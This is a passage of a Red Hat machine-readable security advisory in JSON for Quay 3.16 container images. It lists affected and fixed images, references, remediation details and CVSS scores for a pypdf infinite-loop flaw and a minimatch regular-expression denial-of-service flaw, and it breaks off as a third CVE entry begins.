"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27628"
},
{
"category": "external",
"summary": "RHBZ#2442543",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442543"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27628",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27628"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27628",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27628"
},
{
"category": "external",
"summary": "https://github.com/py-pdf/pypdf/commit/0fbd95938724ad2d72688d4112207c0590f0483f",
"url": "https://github.com/py-pdf/pypdf/commit/0fbd95938724ad2d72688d4112207c0590f0483f"
},
{
"category": "external",
"summary": "https://github.com/py-pdf/pypdf/issues/3654",
"url": "https://github.com/py-pdf/pypdf/issues/3654"
},
{
"category": "external",
"summary": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-2rw7-x74f-jg35",
"url": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-2rw7-x74f-jg35"
}
],
"release_date": "2026-02-25T02:45:37.543000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T15:21:25+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6567"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "pypdf: possible infinite loop when loading circular /Prev entries in cross-reference streams"
},
{
"cve": "CVE-2026-27904",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-26T02:01:23.004531+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442922"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in minimatch. A remote attacker could exploit this vulnerability by providing a specially crafted glob expression with nested unbounded quantifiers. This could lead to catastrophic backtracking in the V8 JavaScript engine, causing the application to become unresponsive and resulting in a Denial of Service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploitation of this flaw requires that a user or service processes untrusted input.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27904"
},
{
"category": "external",
"summary": "RHBZ#2442922",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442922"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27904",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27904"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74",
"url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74"
}
],
"release_date": "2026-02-26T01:07:42.693000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T15:21:25+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6567"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions"
},
{
"cve": "CVE-2026-28498",
"cwe": {
"id": "CWE-325",
"name": "Missing Cryptographic Step"
},
"discovery_date": "2026-03-16T19:02:00.128339+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
